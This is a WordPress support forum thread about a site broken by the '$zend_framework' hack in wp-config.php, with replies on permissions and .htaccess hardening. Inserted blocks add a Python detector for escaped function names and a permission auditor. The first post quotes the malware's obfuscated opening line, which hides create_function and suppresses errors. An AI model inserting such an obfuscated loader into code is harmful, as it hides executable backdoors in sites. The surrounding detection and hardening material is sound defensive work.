• Checking script in one site said it was a 500 error. Tried to get to it, the admin, page is blank on iPad. Site is 500.

    I went in via FTP and see wp-config.php changed today. I remember logging in earlier and a script said to fix that file, so I said yes. Due to memory issues, I can’t remember which script. I can’t get in to see if it was a plugin or not. WAIT I do remember looking at WP All In One Security but don’t remember which asked for change. I know I went to Filesystem Security if that helps. One of the tabs said to upgrade/ WAIT I remember. Chmod was 0666 and it said it needed 0644 or vice versa.

    Anyway, the config file begins with the following, then about 200 lines of letters/numbers, at least that way in iPad. I can’t check my Windows laptop

    <?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("",

    Don’t know if that code was added today but chmod changed.

Viewing 14 replies - 1 through 14 (of 14 total)
  • Moderator t-p

    (@t-p)

    Error 500 ISE is very generic and can be caused by numerous underlying issues. Here are some things you can try to solve it:
    – Your first step should be checking your site’s error logs for a more specific error message. If you need help locating them, ask your hosting provider to help you with that.
    – Check with your host if the domain name is configured properly to point to the public_html folder.
    – It may indicate an .htaccess issue. Regenerate .htaccess, and be sure the encoding in your text editor is Unicode No BOM.
    – It may also indicate a problem with the configuration on the server. Usually your hosting company tech support can help.
    – It could be a problem with the plugins; try resetting the plugins folder by FTP or phpMyAdmin.
    – It could be a problem with the theme. Momentarily, try switching to the default WordPress theme via FTP or whatever file management application your host provides by renaming your current theme to rule out any theme specific issue.
    – If the above troubleshooting steps fail to resolve the issue, try manually re-uploading all files and folders EXCEPT the wp-config.php file and the /wp-content/ directory from a fresh download of WordPress. Make sure that you delete the old copies of files & folder before uploading the new ones. Read the Manual Update directions first!

    Thread Starter SickSquirrel

    (@sicksquirrel)

    But the only file changed was config. The paste showed something was wrong. Plus

    14:19:15 2013] [error] [client *******] PHP Parse error: syntax error, unexpected ‘<‘ in /………………………./user_dir/site/wp-config.php on line 1

    That’s an exploit/hack on WordPress and has affected your site. You’re going to need to do a restore from a backup.

    See Codex: FAQ My site was hacked

    Fix for $zend_framework WordPress Hack

    $zend_framework WordPress Hacks

    Or just Google “wordpress zend framework hack”
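
Added example, not part of the thread: the escaped string quoted in the first post is a PHP double-quoted literal mixing `\xHH` and octal escapes, and it decodes to `create_function`. The sketch below decodes such literals and flags variables that hide a function name and are then called; the `SUSPICIOUS` list and all function names are assumptions chosen for illustration.

```python
import re

# Function names that have no reason to be spelled with escape sequences.
# This list is an assumption for the example, not a complete signature set.
SUSPICIOUS = {"create_function", "eval", "assert", "base64_decode",
              "gzinflate", "str_rot13", "preg_replace"}

# PHP double-quoted escapes: \xHH (1-2 hex digits) and \OOO (1-3 octal digits).
ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")
# $var = "..." assignments, allowing backslash pairs inside the literal.
ASSIGN = re.compile(r'\$(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"', re.S)


def decode_php_escapes(literal):
    """Decode only hex and octal escapes; all other text is left untouched."""
    def repl(m):
        code = int(m.group(1), 16) if m.group(1) else int(m.group(2), 8) & 0xFF
        return chr(code)
    return ESCAPE.sub(repl, literal)


def find_hidden_calls(php_source):
    """Return (variable, decoded_name, is_called) for each escaped literal
    that decodes to a suspicious function name."""
    findings = []
    for m in ASSIGN.finditer(php_source):
        var, literal = m.group(1), m.group(2)
        if not ESCAPE.search(literal):
            continue  # plain strings are not interesting here
        decoded = decode_php_escapes(literal)
        if decoded.lower() in SUSPICIOUS:
            call = re.search(r"\$" + re.escape(var) + r"\s*\(", php_source)
            findings.append((var, decoded, call is not None))
    return findings


# The fragment quoted in the first post (truncated there, so truncated here).
SAMPLE = (r'<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156'
          r'\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("",')
# Constructed clean line for comparison.
CLEAN = '<?php define("DB_NAME", "wordpress"); $table_prefix = "wp_";'

if __name__ == "__main__":
    print(find_hidden_calls(SAMPLE))
    print(find_hidden_calls(CLEAN))
```

Run over every `.php` file in a site download, a hit on line 1 of a file such as wp-config.php marks it for replacement from a clean backup.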

    Thread Starter SickSquirrel

    (@sicksquirrel)

    Thanks. How did they get to it to exploit? What is the exploit? Any other files they could have changed? I have security precautions in place …

    How did they get to it to exploit?

    As suggested by Bulletproof Security, permissions for wp-config.php should be 0400 and left there until *you* might make a change.

    htaccess 0404
    wp-config.php 0400
    index.php 0400
    wp-blog-header.php 0400
    root folder 0705
    wp-admin/ 0705
    wp-includes/ 0705
    wp-content/ 0705
    Thread Starter SickSquirrel

    (@sicksquirrel)

    Thanks. Will change all once I’m restored. Will do it on all other sites, too

    Thread Starter SickSquirrel

    (@sicksquirrel)

    My FTP program (FTP Pro To Go as I’m on iPad right now; tomorrow Windows) allows 3 numbers. Can you give it as Owner Group World?

    My FileZilla is the same, so just drop the preceding zero.
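
Added example, not part of the thread: a small audit that compares a WordPress directory against the permission list given earlier in the thread and reports, in the three-digit form FTP clients accept, every entry that grants more than the recommended mode. The function names and the sample tree are constructed for illustration, and `.htaccess` is assumed for the entry the post writes as "htaccess".

```python
import os
import stat
import tempfile

# Modes from the list earlier in the thread, relative to the WordPress root.
# ".htaccess" is assumed for the entry the post writes as "htaccess".
RECOMMENDED = {
    ".htaccess": 0o404, "wp-config.php": 0o400, "index.php": 0o400,
    "wp-blog-header.php": 0o400, ".": 0o705, "wp-admin": 0o705,
    "wp-includes": 0o705, "wp-content": 0o705,
}


def audit(root):
    """Return (name, actual, wanted, extra) for each listed entry that grants
    permission bits the recommended mode does not. Modes are three-digit
    octal; extra is an rwx string covering owner, group and world."""
    report = []
    for rel, wanted in RECOMMENDED.items():
        try:
            actual = stat.S_IMODE(os.lstat(os.path.join(root, rel)).st_mode)
        except FileNotFoundError:
            continue  # not every install has every entry
        extra = actual & ~wanted & 0o777
        if extra:
            report.append((rel, "%03o" % actual, "%03o" % wanted,
                           stat.filemode(extra)[1:]))
    return report


def build_sample_site(root):
    """Constructed tree: a world-writable wp-config.php, a locked index.php."""
    for name, mode in (("wp-config.php", 0o666), ("index.php", 0o400)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("<?php // constructed sample\n")
        os.chmod(path, mode)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        for row in audit(site):
            print("%-20s is %s, recommended %s, extra bits %s" % row)
```

The 0666 mode mentioned in the first post shows up here as extra bits `-w-rw-rw-`, meaning owner, group and world can all write to the file.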

    Thread Starter SickSquirrel

    (@sicksquirrel)

    Ah, thank you. Will try it later as FTP is busy downloading site.

    Ask your host about switching to SFTP since FTP sends your credentials and whatever else out in plain text.

    Thread Starter SickSquirrel

    (@sicksquirrel)

    Host says no. “Pam, unfortunately SFTP isn’t supported at this time as it requires a shell/ssh connection to tunnel through and we do not allow SSH due to security reasons.”

    I used to use SSH to reach my own server years ago but I had full control and a server admin who was a security whiz. Now I have to bend to their rules.

    I did set chmod as you directed on all sites. My only concern is your statement about changing it back. What needs to be changed and to what do I change it to?

    If you are asking about “permissions for wp-config.php should be 0400 and left there until *you* might make a change”, I am saying to never open those permissions for any script unless it is something like the Sucuri plugin resetting your keys after a hack. Also, in the morning (at my other machine) I will post a few lines of code to add at the top of htaccess to “Deny All” in relation to wp-config.php.

    Thread Starter SickSquirrel

    (@sicksquirrel)

    Thanks. So the config file should never need tweaking so I can leave it set as is. I have two more sites to do, I did notice a couple of sites gave a 550 error when putting .htaccess to 404. One allowed it after but the rest said no. I only did the main file, not each folder.

    550 CHMOD SITE FAILED

    I did notice a couple of sites gave a 550 error when putting .htaccess to 404. One allowed it after but the rest said no. I only did the main file, not each folder.

    That kind of thing is beyond my knowledge, but I would be finding out exactly why a higher setting seems to be needed. To the best of my knowledge, that file does not need to be changed during the course of normal operation.

    Here is the piece of code I had mentioned:

    ## add at top of htaccess
    ## note: also go set wp-config.php permissions to 0400
    # deny wp-config.php
    <files wp-config.php>
    order allow,deny
    deny from all
    </files>

    Then, this one keeps anyone and everyone from reading .htaccess and any other “dot” file with no name (such as a .pwrd file):

    # deny .htaccess .htpasswd etc.
    RedirectMatch 403 /\..*$

The topic ‘500 server error’ is closed to new replies.